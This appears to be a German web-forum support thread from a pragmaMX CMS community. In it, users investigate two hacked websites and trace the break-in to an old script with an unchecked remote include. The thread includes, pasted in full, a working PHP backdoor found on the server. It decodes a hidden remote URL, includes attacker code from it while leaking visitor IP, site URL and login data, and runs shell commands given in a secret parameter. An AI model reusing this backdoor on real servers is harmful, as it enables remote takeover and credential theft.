2 meiner Domains hats grad erwischt.
Ich zähl mal so auf:
im Ordner:
/html/includes/detection
waren 2 Dateien neu:
properties.php
und
time.php
die config.php wurde verändert.
Wenn ich das SMF aufrufen will:
Parse error: parse error, unexpected T_STRING in /home/www/np161/html/modules/Forum/smf/Settings.php on line 28
die .css Datei im mxRainbow wurde verändert
der albums ordner von coppermine hat ebenfalls neue dateien:
.htaccess wurde verändert
include.php
includes.php
index.php
message.php
auf ner zweiten domain wurde die admin.php verändert. die habe ich versehentlich gelöscht die anderen Dateien gesichert.
Hi
leider hast du die wichtigsten Angaben vergessen.
Welche Version vom Pragmamx benützt du zur Zeit?
Welche Modul sind eingebaut die nicht hier zum Download angeboten werden?
pragmaMX 0.1.8
yellowpages modul ist nicht von hier.
neu installiert wurde zuletzt smf
2te domain:
im albums verzeichniss von coppermine:
.htaccess verändert
neue dateien:
test.php
commands.php
common.php
contacts.php
finfo.php
layout.php
links.php
options.php
tests.php
edit: oje, in vielen verzeichnissen von coppermine sind etliche dateien neu :-(
irgendwie gibt das für mich keinen sinn wenn es ein Hackangriff wäre. Warum würden sie so viele Datein aufspielen??
Normal läuft ein Hackangriff eigentlich ziemlich schnell ab und es wird eigentlich meistens eine HTML datein eingefügt die aufgerufen wird.
Desweiteren ergibt die struktur der abgelegten Datein keine logik. Warum legen sie datein in Coppermine ab?
Gibt es weitere User die zugriff per FTP haben??
Ist aus den Datein irgendwas rauszulesen die aufgespielt worden sind?
hi
wichtig sind doch die log-files, um zu sehen was da passiert ist ::) ::)
kein zugriff für andere, nicht auf diesen domains.
rauslesen kann ich zumindest nichts:
hier mal ein beispiel:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
hi
dann schreibe deinen provider an, und bitte ihn um die files !!!
dann kann Andi und jubi sich das mal anschauen !!
die machen grad ein backup, hab ne mail geschickt.
wenn ich was neues hab geb ich bescheid
Hi :)
bitte FTP-Zugangsdaten, Adminaccount usw. per PM an Jubilee und mich.
Möglichst auch logfiles...
Dann guggen wir mal.
Ich würde dir empfehlen, die Seiten vorübergehend vom Netz zu nehmen.
Weiss Gott, was die da alles hochgespielt haben....
Schau Dir auch die Coppermine genau an.
Ich tippe mal darauf!
Die hatte in der Vergangenheit sehr viele Löcher bzw.kann o. konnte direkt aufgerufen werden.
Von hier die Version hab ich nicht getestet, da ich sowas garnicht erst mehr installiere.
Moin :)
jetzt bitte nicht wild rum spekulieren.
Ich weiss nicht, wer immer noch den Quatsch mit der löchrigen Coppermine verbreitet. Das ist alles ausgemachter Blödsinn. Der nuke-Port hatte diese Löcher, nicht die Standallone Version. Die Sicherheitslücken, die zuletzt in der Standallone waren, konnten innerhalb des pragmaMx nicht ausgenutzt werden. Zudem betraf das meiste nicht die Coppermine selbst, sondern falsch konfigurierte Apache Server, die eben mit der Coppermine hochgeladene Dateien als Script interpretieren konnten....
Ich habe anhand der Logfiles die Lücke gefunden.
Es ist ein Script in einem der Unterordner, auf der einen Domain. Mit dem Teil kann man beliebige Remote Dateien includen. Das Script hat mit dem pragmaMx keine Verbindung ....
edit:
so, script zum downloaden gefunden ;)
Wieder ein klassischer....
include($*****_SYSTEM['server_path'].'include/javascript.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/text-out.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/images.inc'.$*****_SYSTEM['php_ext']);
Ohne check, nix....
Zitat von: Andi am 03 Oktober 2006, 03:52:43
so, script zum downloaden gefunden ;)
include($*****_SYSTEM['server_path'].'include/javascript.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/text-out.inc'.$*****_SYSTEM['php_ext']);
require($*****_SYSTEM['server_path'].'include/images.inc'.$*****_SYSTEM['php_ext']);
Hi Andi,
ich such grad diese Dateien finde aber nichts...
In welchem Unterordner soll das sein?
Moin :)
du müsstest eine mail von mir bekommen haben, da ist der Dateipfad aufgezeigt.
Näheres per PM ;)
Na da hast ja was altes gefunden :-)
Das stammt noch aus nicht cms-Zeiten, lösch ich gleich, vielen dank :-)))
ammm ammm ;D Hacked = SpyGrup.Org 8)by manasiyok ;D
Iyi tamam sen devam konus. ;)
Hi Andi,
wusste garnicht, dass du Türkisch kannst? Den obigen Beitrag von manasiyok (übersetzt: hat keine Bedeutung) kann ich nicht so recht einordnen?